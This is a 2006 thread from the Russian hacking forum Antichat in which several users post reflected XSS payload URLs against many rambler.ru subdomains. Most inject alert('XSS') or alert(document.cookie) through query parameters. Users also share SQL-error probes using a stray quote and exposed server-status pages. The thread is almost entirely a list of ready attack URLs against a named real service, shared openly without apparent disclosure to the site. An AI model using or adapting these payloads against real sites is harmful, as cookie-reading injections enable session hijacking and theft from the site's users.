ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу XSS на rambler.ru
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

XSS на rambler.ru
  #1  
Старый 07.03.2006, 23:35
Аватар для iNcluDe
iNcluDe
Новичок
Регистрация: 07.03.2006
Сообщений: 18
Провел на форуме:
50877

Репутация: 3
Thumbs up XSS на rambler.ru
Решил потратить немного времени на поиск багов на rambler.ru, результат не заставил себя ждать, если у кого-то ещё что-то есть выкладывайте

[XSS]

http://olymp2006.rambler.ru/shedule.html?day=%3Cscript%3Ealert('XSS')%3C/script%3E

http://olymp2006.rambler.ru/winners.html?day=http://olymp2006.rambler.ru/shedule.html?day=%3Cscript%3Ealert(/XSS/)%3C/script%3E

http://www.rambler.ru/db/sport/news.html?d=%3Cscript%3Ealert('XSS')%3C/script%3E

http://adstat.rambler.ru/wrds/?date=0601&words=%3Cscript%3Ealert('XSS')%3C/script%3E

[Ошибки]

http://nakarte.rambler.ru/samara/?query=4%27&x=15&y=4'

http://topshop.rambler.ru/click.html?id=4'
 
Ответить с цитированием

  #2  
Старый 07.03.2006, 23:41
Аватар для vectorg
vectorg
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
Провел на форуме:
3212607

Репутация: 454
По умолчанию
старенькое... уже выкладывал гдето, но пусть будет всё в одной теме...

http://finance.rambler.ru/db/chain.html?type=fix&chain_id=<script>alert(documen t.cookie)</script>

http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words="><script>alert(document.cookie) </script>&ftype=5&form=0&hu=1&what=0

http://smi.rambler.ru/main.cgi?action=<script>alert(document.cookie)</script>

http://www.rambler.ru/db/news/news.html?s=5&detail="><script>alert(document.cook ie)</script>

тоже интересно

http://info.rambler.ru/db/auth/

http://info.rambler.ru/server-status

http://info.rambler.ru:8100/server-status
 
Ответить с цитированием

  #3  
Старый 07.03.2006, 23:44
Аватар для iNcluDe
iNcluDe
Новичок
Регистрация: 07.03.2006
Сообщений: 18
Провел на форуме:
50877

Репутация: 3
По умолчанию
Это вроде как новое, а может я просто не все топы смотрел =)
Вот что до этого находил
http://antisec.2x4.ru/advisories/rambler.txt
 
Ответить с цитированием

  #4  
Старый 04.06.2006, 00:16
Аватар для Dagon
Dagon
Познающий
Регистрация: 27.03.2006
Сообщений: 86
Провел на форуме:
972602

Репутация: 52
По умолчанию
http://horoscopes.rambler.ru/day.html?day=1rat"><script>alert(1)</script>&month=4&year=1965&gender=f

http://www.rambler.ru/db/sport/msg.html?mid=7936188rat"><script>alert('Rat inside!')</script>

http://foto.rambler.ru/srch?control_charset="><script>alert('Rat%20inside ')</script>

http://planeta.rambler.ru/search.html?sort="><script>alert(1)</script>
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Книга sql, xss и т.д. и т.п. tclover Болталка 9 28.03.2006 12:03
Гле взять ICQ базу rambler.ru Allen ICQ 4 08.03.2006 00:25
Xss на yandex.ru Pridu_ROCK Уязвимости 1 04.03.2006 01:08
Active XSS in Invision Power Board 2.1.4 k00p3r Уязвимости 8 03.03.2006 20:51



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ